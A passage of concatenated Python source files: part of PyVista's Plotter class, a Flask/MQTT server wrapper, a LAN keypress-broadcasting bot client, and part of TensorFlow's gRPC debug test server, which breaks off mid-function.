elif cpos is not None:
renderer.camera_position = cpos
self._first_time = False
def reset_camera_clipping_range(self):
"""Reset camera clipping planes."""
self.renderer.ResetCameraClippingRange()
def add_light(self, light, only_active=False):
"""Add a Light to the scene.
Parameters
----------
light : Light or vtkLight
The light to be added.
only_active : bool, optional
If ``True``, only add the light to the active
renderer. The default is that every renderer adds the
light. To add the light to an arbitrary renderer, see
:func:`pyvista.plotting.renderer.Renderer.add_light`.
Examples
--------
Create a plotter that we initialize with no lights, and add a
cube and a single headlight to it.
>>> import pyvista as pv
>>> plotter = pv.Plotter(lighting='none')
>>> _ = plotter.add_mesh(pv.Cube())
>>> light = pv.Light(color='cyan', light_type='headlight')
>>> plotter.add_light(light)
>>> plotter.show()
"""
renderers = [self.renderer] if only_active else self.renderers
for renderer in renderers:
renderer.add_light(light)
def remove_all_lights(self, only_active=False):
"""Remove all lights from the scene.
Parameters
----------
only_active : bool
If ``True``, only remove lights from the active
renderer. The default is that lights are stripped from
every renderer.
Examples
--------
Create a plotter and remove all lights after initialization.
Note how the rendered mesh is completely flat.
>>> import pyvista as pv
>>> plotter = pv.Plotter()
>>> plotter.remove_all_lights()
>>> plotter.renderer.lights
[]
>>> _ = plotter.add_mesh(pv.Sphere(), show_edges=True)
>>> plotter.show()
Note how this differs from a plot with default lighting.
>>> pv.Sphere().plot(show_edges=True, lighting=True)
"""
renderers = [self.renderer] if only_active else self.renderers
for renderer in renderers:
renderer.remove_all_lights()
def where_is(self, name):
"""Return the subplot coordinates of a given actor.
Parameters
----------
name : str
Actor's name.
Returns
-------
list(tuple(int))
A list with the subplot coordinates of the actor.
Examples
--------
>>> import pyvista as pv
>>> plotter = pv.Plotter(shape=(2, 2))
>>> plotter.subplot(0, 0)
>>> _ = plotter.add_mesh(pv.Box(), name='box')
>>> plotter.subplot(0, 1)
>>> _ = plotter.add_mesh(pv.Sphere(), name='sphere')
>>> plotter.subplot(1, 0)
>>> _ = plotter.add_mesh(pv.Box(), name='box')
>>> plotter.subplot(1, 1)
>>> _ = plotter.add_mesh(pv.Cone(), name='cone')
>>> plotter.where_is('box')
[(0, 0), (1, 0)]
>>> plotter.show()
"""
places = []
for index in range(len(self.renderers)):
if name in self.renderers[index]._actors:
places.append(tuple(self.renderers.index_to_loc(index)))
return places
class Plotter(BasePlotter):
"""Plotting object to display vtk meshes or numpy arrays.
Parameters
----------
off_screen : bool, optional
Renders off screen when ``True``. Useful for automated
screenshots.
notebook : bool, optional
When ``True``, the resulting plot is placed inline in a jupyter
notebook. Assumes a jupyter console is active. Automatically
enables ``off_screen``.
shape : list or tuple, optional
Number of sub-render windows inside of the main window.
Specify two across with ``shape=(2, 1)`` and a two by two grid
with ``shape=(2, 2)``. By default there is only one render
window. Can also accept a string descriptor as shape. E.g.:
* ``shape="3|1"`` means 3 plots on the left and 1 on the right,
* ``shape="4/2"`` means 4 plots on top and 2 at the bottom.
border : bool, optional
Draw a border around each render window. Default ``False``.
border_color : str or 3 item list, optional
Either a string, rgb list, or hex color string. For example:
* ``color='white'``
* ``color='w'``
* ``color=[1, 1, 1]``
* ``color='#FFFFFF'``
window_size : list, optional
Window size in pixels. Defaults to ``[1024, 768]``, unless
set differently in the relevant theme's ``window_size``
property.
multi_samples : int, optional
The number of multi-samples used to mitigate aliasing. 4 is a
good default but 8 will have better results with a potential
impact on performance.
line_smoothing : bool, optional
If ``True``, enable line smoothing.
polygon_smoothing : bool, optional
If ``True``, enable polygon smoothing.
lighting : str, optional
What lighting to set up for the plotter.
Accepted options:
* ``'light kit'``: a vtk Light Kit composed of 5 lights.
* ``'three lights'``: illumination using 3 lights.
* ``'none'``: no light sources at instantiation.
The default is ``'light kit'`` (to be precise, 5 separate
lights that act like a Light Kit).
theme : pyvista.themes.DefaultTheme, optional
Plot-specific theme.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> mesh = examples.load_hexbeam()
>>> another_mesh = examples.load_uniform()
>>> plotter = pyvista.Plotter()
>>> actor = plotter.add_mesh(mesh, color='red')
>>> actor = plotter.add_mesh(another_mesh, color='blue')
>>> plotter.show()
"""
last_update_time = 0.0
right_timer_id = -1
def __init__(self, off_screen=None, notebook=None, shape=(1, 1),
groups=None, row_weights=None, col_weights=None,
border=None, border_color='k', border_width=2.0,
window_size=None, multi_samples=None, line_smoothing=False,
point_smoothing=False, polygon_smoothing=False,
splitting_position=None, title=None, lighting='light kit',
theme=None):
"""Initialize a vtk plotting object."""
super().__init__(shape=shape, border=border,
border_color=border_color,
border_width=border_width,
groups=groups, row_weights=row_weights,
col_weights=col_weights,
splitting_position=splitting_position,
title=title, lighting=lighting, theme=theme)
log.debug('Plotter init start')
# check if a plotting backend is enabled
_warn_xserver()
def on_timer(iren, event_id):
"""Exit application if interactive renderer stops."""
if event_id == 'TimerEvent' and self.iren._style != "Context":
self.iren.terminate_app()
if off_screen is None:
off_screen = pyvista.OFF_SCREEN
if notebook is None:
if self._theme.notebook is not None:
notebook = self._theme.notebook
else:
notebook = scooby.in_ipykernel()
self.notebook = notebook
if self.notebook:
off_screen = True
self.off_screen = off_screen
self._window_size_unset = False
if window_size is None:
self._window_size_unset = True
window_size = self._theme.window_size
self.__prior_window_size = window_size
if multi_samples is None:
multi_samples = self._theme.multi_samples
# initialize render window
self.ren_win = _vtk.vtkRenderWindow()
self.ren_win.SetMultiSamples(multi_samples)
self.ren_win.SetBorders(True)
if line_smoothing:
self.ren_win.LineSmoothingOn()
if point_smoothing:
self.ren_win.PointSmoothingOn()
if polygon_smoothing:
self.ren_win.PolygonSmoothingOn()
for renderer in self.renderers:
self.ren_win.AddRenderer(renderer)
# Add the shadow renderer to allow us to capture interactions within
# a given viewport
# https://vtk.org/pipermail/vtkusers/2018-June/102030.html
number_of_layers = self.ren_win.GetNumberOfLayers()
current_layer = self.renderer.GetLayer()
self.ren_win.SetNumberOfLayers(number_of_layers + 1)
self.ren_win.AddRenderer(self.renderers.shadow_renderer)
self.renderers.shadow_renderer.SetLayer(current_layer + 1)
self.renderers.shadow_renderer.SetInteractive(False) # never needs to capture
if self.off_screen:
self.ren_win.SetOffScreenRendering(1)
# vtkGenericRenderWindowInteractor has no event loop and
# allows the display client to close on Linux when
# off_screen. We still want an interactor for off screen
# plotting since there are some widgets (like the axes
# widget) that need an interactor
interactor = _vtk.vtkGenericRenderWindowInteractor()
else:
interactor = None
# Add ren win and interactor
self.iren = RenderWindowInteractor(self, light_follow_camera=False,
interactor=interactor)
self.iren.set_render_window(self.ren_win)
self.enable_trackball_style() # internally calls update_style()
self.iren.add_observer("KeyPressEvent", self.key_press_event)
# Set camera widget based on theme. This requires that an
# interactor be present.
if self.theme._enable_camera_orientation_widget:
self.add_camera_orientation_widget()
# Set background
self.set_background(self._theme.background)
# Set window size
self.window_size = window_size
# add timer event if interactive render exists
self.iren.add_observer(_vtk.vtkCommand.TimerEvent, on_timer)
if self._theme.depth_peeling.enabled:
if self.enable_depth_peeling():
for renderer in self.renderers:
renderer.enable_depth_peeling()
log.debug('Plotter init stop')
def show(self, title=None, window_size=None, interactive=True,
auto_close=None, interactive_update=False, full_screen=None,
screenshot=False, return_img=False, cpos=None, use_ipyvtk=None,
jupyter_backend=None, return_viewer=False, return_cpos=None,
**kwargs):
"""Display the plotting window.
Parameters
----------
title : str, optional
Title of plotting window. Defaults to
:attr:`pyvista.global_theme.title <pyvista.themes.DefaultTheme.title>`.
window_size : list, optional
Window size in pixels. Defaults to
:attr:`pyvista.global_theme.window_size <pyvista.themes.DefaultTheme.window_size>`.
interactive : bool, optional
Enabled by default. Allows user to pan and move figure.
Defaults to
:attr:`pyvista.global_theme.interactive <pyvista.themes.DefaultTheme.interactive>`.
auto_close : bool, optional
Exits plotting session when user closes the window when
interactive is ``True``. Defaults to
:attr:`pyvista.global_theme.auto_close <pyvista.themes.DefaultTheme.auto_close>`.
interactive_update : bool, optional
Disabled by default. Allows the user to draw without blocking;
the user should call :func:`BasePlotter.update` in each iteration.
full_screen : bool, optional
Opens window in full screen. When enabled, ignores
``window_size``. Defaults to
:attr:`pyvista.global_theme.full_screen <pyvista.themes.DefaultTheme.full_screen>`.
screenshot : str, pathlib.Path, BytesIO or bool, optional
Take a screenshot of the initial state of the plot.
If a string, it specifies the path to which the screenshot
is saved. If ``True``, the screenshot is returned as an
array. Defaults to ``False``. For interactive screenshots
it's recommended to first call ``show()`` with
``auto_close=False`` to set the scene, then save the
screenshot in a separate call to ``show()`` or
:func:`Plotter.screenshot`.
return_img : bool
Returns a numpy array representing the last image along
with the camera position.
cpos : list(tuple(floats))
The camera position. You can also set this with
:attr:`Plotter.camera_position`.
use_ipyvtk : bool, optional
Deprecated. Instead, set the backend either globally with
``pyvista.set_jupyter_backend('ipyvtklink')`` or with
``backend='ipyvtklink'``.
jupyter_backend : str, optional
Jupyter notebook plotting backend to use. One of the
following:
* ``'none'`` : Do not display in the notebook.
* ``'pythreejs'`` : Show a ``pythreejs`` widget
* ``'static'`` : Display a static figure.
* ``'ipygany'`` : Show a ``ipygany`` widget
* ``'panel'`` : Show a ``panel`` widget.
This can also be set globally with
:func:`pyvista.set_jupyter_backend`.
return_viewer : bool, optional
Return the jupyterlab viewer, scene, or display object
when plotting with jupyter notebook.
return_cpos : bool, optional
Return the last camera position from the render window
when enabled. Default based on theme setting. See
:attr:`pyvista.themes.DefaultTheme.return_cpos`.
**kwargs : dict, optional
Developer keyword arguments.
Returns
-------
cpos : list
List of camera position, focal point, and view up.
Returned only when ``return_cpos=True`` or set in the
default global or plot theme. Not returned when in a
jupyter notebook and ``return_viewer=True``.
image : np.ndarray
Numpy array of the last image when either ``return_img=True``
or ``screenshot=True`` is set. Not returned when in a
jupyter notebook with ``return_viewer=True``. Optionally
contains alpha values. Sized:
* [Window height x Window width x 3] if the theme sets
``transparent_background=False``.
* [Window height x Window width x 4] if the theme sets
``transparent_background=True``.
widget
IPython widget when ``return_viewer=True``.
Notes
-----
Please use the ``q``-key to close the plotter as some
operating systems (namely Windows) will experience issues
saving a screenshot if the exit button in the GUI is pressed.
Examples
--------
Simply show the plot of a mesh.
>>> import pyvista as pv
>>> pl = pv.Plotter()
>>> _ = pl.add_mesh(pv.Cube())
>>> pl.show()
Take a screenshot interactively. Screenshot will be of the
first image shown, so use the first call with
``auto_close=False`` to set the scene before taking the
screenshot.
>>> pl = pv.Plotter()
>>> _ = pl.add_mesh(pv.Cube())
>>> pl.show(auto_close=False) # doctest:+SKIP
>>> pl.show(screenshot='my_image.png') # doctest:+SKIP
Display a ``pythreejs`` scene within a jupyter notebook.
>>> pl.show(jupyter_backend='pythreejs') # doctest:+SKIP
Return a ``pythreejs`` scene.
>>> pl.show(jupyter_backend='pythreejs', return_viewer=True) # doctest:+SKIP
Obtain the camera position when using ``show``.
>>> pl = pv.Plotter()
>>> _ = pl.add_mesh(pv.Sphere())
>>> pl.show(return_cpos=True) # doctest:+SKIP
[(2.223005211686484, -0.3126909484828709, 2.4686209867735065),
(0.0, 0.0, 0.0),
(-0.6839951597283509, -0.47207319712073137, 0.5561452310578585)]
"""
# developer keyword argument: runs a function immediately prior to ``close``
self._before_close_callback = kwargs.pop('before_close_callback', None)
jupyter_kwargs = kwargs.pop('jupyter_kwargs', {})
assert_empty_kwargs(**kwargs)
if interactive_update and auto_close is None:
auto_close = False
elif interactive_update and auto_close:
warnings.warn(textwrap.dedent("""\
The plotter will close immediately automatically since ``auto_close=True``.
Either do not specify ``auto_close``, or set it to ``False`` if you want to
interact with the plotter interactively.\
""")
)
elif auto_close is None:
auto_close = self._theme.auto_close
if use_ipyvtk:
txt = textwrap.dedent("""\
use_ipyvtk is deprecated. Set the backend
globally with ``pyvista.set_jupyter_backend("ipyvtklink")``
or with ``backend="ipyvtklink"``.
""")
from pyvista.core.errors import DeprecationError
raise DeprecationError(txt)
if not hasattr(self, "ren_win"):
raise RuntimeError("This plotter has been closed and cannot be shown.")
if full_screen is None:
full_screen = self._theme.full_screen
if full_screen:
self.ren_win.SetFullScreen(True)
self.ren_win.BordersOn() # super buggy when disabled
else:
if window_size is None:
window_size = self.window_size
else:
self._window_size_unset = False
self.ren_win.SetSize(window_size[0], window_size[1])
# reset the camera for the first render unless a camera has already been set
self._on_first_render_request(cpos)
# handle plotter notebook
if jupyter_backend and not self.notebook:
warnings.warn('Not within a jupyter notebook environment.\n'
'Ignoring ``jupyter_backend``.')
if self.notebook:
from ..jupyter.notebook import handle_plotter
if jupyter_backend is None:
jupyter_backend = self._theme.jupyter_backend
if jupyter_backend != 'none':
disp = handle_plotter(self, backend=jupyter_backend,
return_viewer=return_viewer,
**jupyter_kwargs)
return disp
self.render()
# This has to be after the first render for some reason
if title is None:
title = self.title
if title:
self.ren_win.SetWindowName(title)
self.title = title
# Keep track of image for sphinx-gallery
if pyvista.BUILDING_GALLERY or screenshot:
# always save screenshots for sphinx_gallery
self.last_image = self.screenshot(screenshot, return_img=True)
self.last_image_depth = self.get_image_depth()
# See: https://github.com/pyvista/pyvista/issues/186#issuecomment-550993270
if interactive and not self.off_screen:
try: # interrupts will be caught here
log.debug('Starting iren')
self.iren.update_style()
if not interactive_update:
# Resolves #1260
if os.name == 'nt':
if _vtk.VTK9:
self.iren.process_events()
else:
global VERY_FIRST_RENDER
if not VERY_FIRST_RENDER:
self.iren.start()
VERY_FIRST_RENDER = False
self.iren.start()
self.iren.initialize()
except KeyboardInterrupt:
log.debug('KeyboardInterrupt')
self.close()
raise KeyboardInterrupt
# In the event that the user hits the exit-button on the GUI (on
# Windows OS) then it must be finalized and deleted as accessing it
# will kill the kernel.
# Here we check for that and clean it up before moving on to any of
# the closing routines that might try to still access that
# render window.
if not self.ren_win.IsCurrent():
self._clear_ren_win() # The ren_win is deleted
# proper screenshots cannot be saved if this happens
if not auto_close:
warnings.warn("`auto_close` ignored: by clicking the exit button, "
"you have destroyed the render window and we have to "
"close it out.")
auto_close = True
# NOTE: after this point, nothing from the render window can be accessed,
# because if a user pressed the close button it destroys the render view
# and a stream of errors will kill the Python kernel if code here tries
# to access that renderer.
# See issues #135 and #186 for insight before editing the
# remainder of this function.
# Close the render window if requested
if auto_close:
self.close()
# If user asked for screenshot, return as numpy array after camera
# position
if return_img or screenshot is True:
if return_cpos:
return self.camera_position, self.last_image
return self.last_image
if return_cpos:
return self.camera_position
def add_title(self, title, font_size=18, color=None, font=None,
shadow=False):
"""Add text to the top center of the plot.
This is merely a convenience method that calls ``add_text``
with ``position='upper_edge'``.
Parameters
----------
title : str
The text to add the rendering.
font_size : float, optional
Sets the size of the title font. Defaults to 18 or the
value of the global theme if set.
color : str or 3 item list, optional,
Either a string, rgb list, or hex color string. Defaults
to white or the value of the global theme if set. For
example:
* ``color='white'``
* ``color='w'``
* ``color=[1, 1, 1]``
* ``color='#FFFFFF'``
font : str, optional
Font name may be ``'courier'``, ``'times'``, or ``'arial'``.
shadow : bool, optional
Adds a black shadow to the text. Defaults to ``False``.
Returns
-------
vtk.vtkTextActor
Text actor added to plot.
Examples
--------
>>> import pyvista
>>> pl = pyvista.Plotter()
>>> pl.background_color = 'grey'
>>> actor = pl.add_title('Plot Title', font='courier', color='k',
... font_size=40)
>>> pl.show()
"""
# add additional spacing from the top of the figure by default
title = '\n' + title
return self.add_text(title, position='upper_edge',
font_size=font_size, color=color, font=font,
shadow=shadow, name='title', viewport=False)
def add_cursor(
self,
bounds=(-1.0, 1.0, -1.0, 1.0, -1.0, 1.0),
focal_point=(0.0, 0.0, 0.0),
color=None,
):
"""Add a cursor of a PyVista or VTK dataset to the scene.
Parameters
----------
bounds : length 6 sequence
Specify the bounds in the format of:
- ``(xmin, xmax, ymin, ymax, zmin, zmax)``
Defaults to ``(-1.0, 1.0, -1.0, 1.0, -1.0, 1.0)``.
focal_point : list or tuple, optional
The focal point of the cursor.
Defaults to ``(0.0, 0.0, 0.0)``.
color : str or sequence, optional
Either a string, RGB sequence, or hex color string. For
example:
* ``color='white'``
* ``color='w'``
* ``color=[1, 1, 1]``
* ``color='#FFFFFF'``
Returns
-------
vtk.vtkActor
VTK actor of the 2D cursor.
Examples
--------
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(sphere)
>>> _ = plotter.add_cursor()
>>> plotter.show()
"""
alg = _vtk.vtkCursor3D()
alg.SetModelBounds(bounds)
alg.SetFocalPoint(focal_point)
alg.AllOn()
mapper = make_mapper(_vtk.vtkDataSetMapper)
mapper.SetInputConnection(alg.GetOutputPort())
actor, prop = self.add_actor(mapper)
prop.SetColor(parse_color(color))
return actor
# Tracks created plotters. At the end of the file as we need to
# define ``BasePlotter`` before including it in the type definition.
_ALL_PLOTTERS: Dict[str, BasePlotter] = {}
def _kill_display(disp_id): # pragma: no cover
"""Forcibly close the display on Linux.
See: https://gitlab.kitware.com/vtk/vtk/-/issues/17917#note_783584
And more details into why...
https://stackoverflow.com/questions/64811503
Notes
-----
This is to be used experimentally and is known to cause issues
on ``pyvistaqt``.
"""
if platform.system() != 'Linux':
raise OSError('This method only works on Linux')
if disp_id:
cdisp_id = int(disp_id[1:].split('_')[0], 16)
# this is unsafe as events might be queued, but sometimes the
# window fails to close if we don't just close it
Thread(target=X11.XCloseDisplay, args=(cdisp_id, )).start()
|
server.py
|
import root.settings as settings
import root.api.rest.rest_routes as rest
from root.api.rest.rest_routes import app
import root.api.mqtt.mqtt_routes as mqtt
from werkzeug.serving import run_simple
import threading
def start_server():
thread = threading.Thread(target = start_thread)
thread.start()
mqtt.connect()
def start_server_https():
thread = threading.Thread(target = start_thread_https)
thread.start()
mqtt.connect()
def start_thread():
app.run(host = settings.FLASK_ADDRESS, port = settings.FLASK_PORT)
def start_thread_https():
app.run(host = settings.FLASK_ADDRESS, port = settings.FLASK_PORT, ssl_context=('/home/on-premise/root/certs/cert.pem', '/home/on-premise/root/certs/key.pem'))
def new_event(topic_event, topic_response, function):
mqtt.new_event(topic_event, topic_response, function)
def new_api(foo, path, method):
rest.new_api(foo, path, method)
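# --- Usage sketch (added; not part of the original module) -----------------
# The handler, route, and topic names below are illustrative assumptions,
# shown only to indicate how the wrappers above are meant to be wired
# together from an application entry point.
#
# if __name__ == "__main__":
#     def ping(payload):                               # hypothetical handler
#         return {"status": "ok"}
#     new_api(ping, "/ping", "GET")                    # REST route via Flask
#     new_event("devices/ping", "devices/pong", ping)  # MQTT event handler
#     start_server()                                   # Flask thread + MQTT connect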
|
client.py
|
import socket
import select
import errno
import sys
from pynput.keyboard import Key, Listener, KeyCode
from pynput import mouse, keyboard
from random import randint
import subprocess
import threading
import time
import os
class RHBotClientConnection():
def __init__(self, ip, delay=0) -> None:
self.delay = delay
self.HEADER_LENGTH = 10
self.IP = ip
self.PORT = 1351
self.my_username = "Testy Test "+str(randint(100, 1000))
self.client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.client_socket.connect((self.IP, self.PORT))
self.client_socket.setblocking(False)
username = self.my_username.encode('utf-8')
username_header = f"{len(username):<{self.HEADER_LENGTH}}".encode(
'utf-8')
self.client_socket.send(username_header + username)
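# Note (added comment): every message on this socket is length-prefixed --
# a fixed-width ASCII header of HEADER_LENGTH bytes carrying the payload
# length, followed by the UTF-8 payload. send_message() and delay_thread()
# below build their frames the same way.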
def send_message(self, message):
if self.delay > 0:
self.send_message_delayed(message, self.delay)
else:
message = message.encode('utf-8')
message_header = f"{len(message):<{self.HEADER_LENGTH}}".encode(
'utf-8')
self.client_socket.send(message_header + message)
def send_message_delayed(self, message, delay):
start_time = time.time()
t = threading.Thread(target=self.delay_thread,
args=(message, delay, start_time))
t.start()
def delay_thread(self, message, delay, start_time):
message = message.encode('utf-8')
message_header = f"{len(message):<{self.HEADER_LENGTH}}".encode(
'utf-8')
time.sleep(delay - (time.time()-start_time))
self.client_socket.send(message_header + message)
def main_loop(self):
while True:
time.sleep(0.5)
class ClientKeypressListener():
def __init__(self, list_servers) -> None:
self.list_servers = list_servers
self.listener = None
self.unreleased_keys = []
def start_keypress_listener(self):
if self.listener is None:
self.listener = Listener(on_press=self.on_press,
on_release=self.on_release)
self.listener.start()
def on_press(self, key):
if key == keyboard.Key.f4:
print("Exiting bot")
os._exit(1)
if str(key) not in self.unreleased_keys:
for server in self.list_servers:
server.send_message(str(key)+",down")
self.unreleased_keys.append(str(key))
def on_release(self, key):
for server in self.list_servers:
server.send_message(str(key)+",up")
self.unreleased_keys.remove(str(key))
class ClientUtils():
def grab_online_servers():
output = subprocess.run("arp -a", capture_output=True).stdout.decode()
list_ips = []
with open("servers.txt", "r") as f:
lines = f.readlines()
for ip in lines:
if ip.strip() in output:
list_ips.append(ip.strip())
return list_ips
def start_server_thread(server):
# pass the bound method itself; calling it here would block instead of
# running it on the new thread
t = threading.Thread(target=server.main_loop, daemon=True)
t.start()
class RHBotClient():
def start(delay_min=0, delay_spacing=5):
list_ips = ClientUtils.grab_online_servers()
list_servers = []
for i, ip in enumerate(list_ips):
if delay_min == 0:
list_servers.append(RHBotClientConnection(ip))
else:
list_servers.append(RHBotClientConnection(
ip, delay_min+i*delay_spacing))
ckl = ClientKeypressListener(list_servers)
ckl.start_keypress_listener()
for server in list_servers:
ClientUtils.start_server_thread(server)
while True:
time.sleep(1)
if __name__ == "__main__":
RHBotClient.start()
|
grpc_debug_test_server.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""GRPC debug server for testing."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import errno
import functools
import hashlib
import json
import os
import re
import shutil
import tempfile
import threading
import time
import portpicker
from tensorflow.core.debug import debug_service_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.util import event_pb2
from tensorflow.python.client import session
from tensorflow.python.debug.lib import debug_data
from tensorflow.python.debug.lib import debug_utils
from tensorflow.python.debug.lib import grpc_debug_server
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import errors
from tensorflow.python.ops import variables
from tensorflow.python.util import compat
def _get_dump_file_path(dump_root, device_name, debug_node_name):
"""Get the file path of the dump file for a debug node.
Args:
dump_root: (str) Root dump directory.
device_name: (str) Name of the device that the debug node resides on.
debug_node_name: (str) Name of the debug node, e.g.,
cross_entropy/Log:0:DebugIdentity.
Returns:
(str) Full path of the dump file.
"""
dump_root = os.path.join(
dump_root, debug_data.device_name_to_device_path(device_name))
if "/" in debug_node_name:
dump_dir = os.path.join(dump_root, os.path.dirname(debug_node_name))
dump_file_name = re.sub(":", "_", os.path.basename(debug_node_name))
else:
dump_dir = dump_root
dump_file_name = re.sub(":", "_", debug_node_name)
now_microsec = int(round(time.time() * 1000 * 1000))
dump_file_name += "_%d" % now_microsec
return os.path.join(dump_dir, dump_file_name)
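# Illustrative note (added comment): for a debug node named
# "cross_entropy/Log:0:DebugIdentity" the helper above produces a file such as
#   <dump_root>/<device path>/cross_entropy/Log_0_DebugIdentity_<microseconds>
# i.e. the op's name scope becomes the directory layout and ":" becomes "_".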
class EventListenerTestStreamHandler(
grpc_debug_server.EventListenerBaseStreamHandler):
"""Implementation of EventListenerBaseStreamHandler that dumps to file."""
def __init__(self, dump_dir, event_listener_servicer):
super(EventListenerTestStreamHandler, self).__init__()
self._dump_dir = dump_dir
self._event_listener_servicer = event_listener_servicer
if self._dump_dir:
self._try_makedirs(self._dump_dir)
self._grpc_path = None
self._cached_graph_defs = []
self._cached_graph_def_device_names = []
self._cached_graph_def_wall_times = []
def on_core_metadata_event(self, event):
self._event_listener_servicer.toggle_watch()
core_metadata = json.loads(event.log_message.message)
if not self._grpc_path:
grpc_path = core_metadata["grpc_path"]
if grpc_path:
if grpc_path.startswith("/"):
grpc_path = grpc_path[1:]
if self._dump_dir:
self._dump_dir = os.path.join(self._dump_dir, grpc_path)
# Write cached graph defs to filesystem.
for graph_def, device_name, wall_time in zip(
self._cached_graph_defs,
self._cached_graph_def_device_names,
self._cached_graph_def_wall_times):
self._write_graph_def(graph_def, device_name, wall_time)
if self._dump_dir:
self._write_core_metadata_event(event)
else:
self._event_listener_servicer.core_metadata_json_strings.append(
event.log_message.message)
def on_graph_def(self, graph_def, device_name, wall_time):
"""Implementation of the tensor value-carrying Event proto callback.
Args:
graph_def: A GraphDef object.
device_name: Name of the device on which the graph was created.
wall_time: An epoch timestamp (in microseconds) for the graph.
"""
if self._dump_dir:
if self._grpc_path:
self._write_graph_def(graph_def, device_name, wall_time)
else:
self._cached_graph_defs.append(graph_def)
self._cached_graph_def_device_names.append(device_name)
self._cached_graph_def_wall_times.append(wall_time)
else:
self._event_listener_servicer.partition_graph_defs.append(graph_def)
def on_value_event(self, event):
"""Implementation of the tensor value-carrying Event proto callback.
Writes the Event proto to the file system for testing. The path written to
follows the same pattern as the file:// debug URLs of tfdbg, i.e., the
name scope of the op becomes the directory structure under the dump root
directory.
Args:
event: The Event proto carrying a tensor value.
Returns:
If the debug node belongs to the set of currently activated breakpoints,
a `EventReply` proto will be returned.
"""
if self._dump_dir:
self._write_value_event(event)
else:
value = event.summary.value[0]
tensor_value = debug_data.load_tensor_from_event(event)
self._event_listener_servicer.debug_tensor_values[value.node_name].append(
tensor_value)
items = event.summary.value[0].node_name.split(":")
node_name = items[0]
output_slot = int(items[1])
debug_op = items[2]
if ((node_name, output_slot, debug_op) in
self._event_listener_servicer.breakpoints):
return debug_service_pb2.EventReply()
def _try_makedirs(self, dir_path):
if not os.path.isdir(dir_path):
try:
os.makedirs(dir_path)
except OSError as error:
if error.errno != errno.EEXIST:
raise
def _write_core_metadata_event(self, event):
core_metadata_path = os.path.join(
self._dump_dir,
debug_data.METADATA_FILE_PREFIX + debug_data.CORE_METADATA_TAG +
"_%d" % event.wall_time)
self._try_makedirs(self._dump_dir)
with open(core_metadata_path, "wb") as f:
f.write(event.SerializeToString())
def _write_graph_def(self, graph_def, device_name, wall_time):
encoded_graph_def = graph_def.SerializeToString()
graph_hash = int(hashlib.md5(encoded_graph_def).hexdigest(), 16)
event = event_pb2.Event(graph_def=encoded_graph_def, wall_time=wall_time)
graph_file_path = os.path.join(
self._dump_dir,
debug_data.device_name_to_device_path(device_name),
debug_data.METADATA_FILE_PREFIX + debug_data.GRAPH_FILE_TAG +
debug_data.HASH_TAG + "%d_%d" % (graph_hash, wall_time))
self._try_makedirs(os.path.dirname(graph_file_path))
with open(graph_file_path, "wb") as f:
f.write(event.SerializeToString())
def _write_value_event(self, event):
value = event.summary.value[0]
# Obtain the device name from the metadata.
summary_metadata = event.summary.value[0].metadata
if not summary_metadata.plugin_data:
raise ValueError("The value lacks plugin data.")
try:
content = json.loads(compat.as_text(summary_metadata.plugin_data.content))
except ValueError as err:
raise ValueError("Could not parse content into JSON: %r, %r" % (content,
err))
device_name = content["device"]
dump_full_path = _get_dump_file_path(
self._dump_dir, device_name, value.node_name)
self._try_makedirs(os.path.dirname(dump_full_path))
with open(dump_full_path, "wb") as f:
f.write(event.SerializeToString())
class EventListenerTestServicer(grpc_debug_server.EventListenerBaseServicer):
"""An implementation of EventListenerBaseServicer for testing."""
def __init__(self, server_port, dump_dir, toggle_watch_on_core_metadata=None):
"""Constructor of EventListenerTestServicer.
Args:
server_port: (int) The server port number.
dump_dir: (str) The root directory to which the data files will be
dumped. If empty or None, the received debug data will not be dumped
to the file system: they will be stored in memory instead.
toggle_watch_on_core_metadata: A list of
(node_name, output_slot, debug_op) tuples to toggle the
watchpoint status during the on_core_metadata calls (optional).
"""
self.core_metadata_json_strings = []
self.partition_graph_defs = []
self.debug_tensor_values = collections.defaultdict(list)
self._initialize_toggle_watch_state(toggle_watch_on_core_metadata)
grpc_debug_server.EventListenerBaseServicer.__init__(
self, server_port,
functools.partial(EventListenerTestStreamHandler, dump_dir, self))
# Members for storing the graph ops traceback and source files.
self._call_types = []
self._call_keys = []
self._origin_stacks = []
self._origin_id_to_strings = []
self._graph_tracebacks = []
self._graph_versions = []
self._source_files = None
def _initialize_toggle_watch_state(self, toggle_watches):
self._toggle_watches = toggle_watches
self._toggle_watch_state = dict()
if self._toggle_watches:
for watch_key in self._toggle_watches:
self._toggle_watch_state[watch_key] = False
def toggle_watch(self):
for watch_key in self._toggle_watch_state:
node_name, output_slot, debug_op = watch_key
if self._toggle_watch_state[watch_key]:
self.request_unwatch(node_name, output_slot, debug_op)
else:
self.request_watch(node_name, output_slot, debug_op)
self._toggle_watch_state[watch_key] = (
not self._toggle_watch_state[watch_key])
def clear_data(self):
self.core_metadata_json_strings = []
self.partition_graph_defs = []
self.debug_tensor_values = collections.defaultdict(list)
self._call_types = []
self._call_keys = []
self._origin_stacks = []
self._origin_id_to_strings = []
self._graph_tracebacks = []
self._graph_versions = []
self._source_files = None
def SendTracebacks(self, request, context):
self._call_types.append(request.call_type)
self._call_keys.append(request.call_key)
self._origin_stacks.append(request.origin_stack)
self._origin_id_to_strings.append(request.origin_id_to_string)
self._graph_tracebacks.append(request.graph_traceback)
self._graph_versions.append(request.graph_version)
return debug_service_pb2.EventReply()
def SendSourceFiles(self, request, context):
self._source_files = request
return debug_service_pb2.EventReply()
def query_op_traceback(self, op_name):
"""Query the traceback of an op.
Args:
op_name: Name of the op to query.
Returns:
The traceback of the op, as a list of 3-tuples:
(filename, lineno, function_name)
Raises:
ValueError: If the op cannot be found in the tracebacks received by the
server so far.
"""
for op_log_proto in self._graph_tracebacks:
for log_entry in op_log_proto.log_entries:
if log_entry.name == op_name:
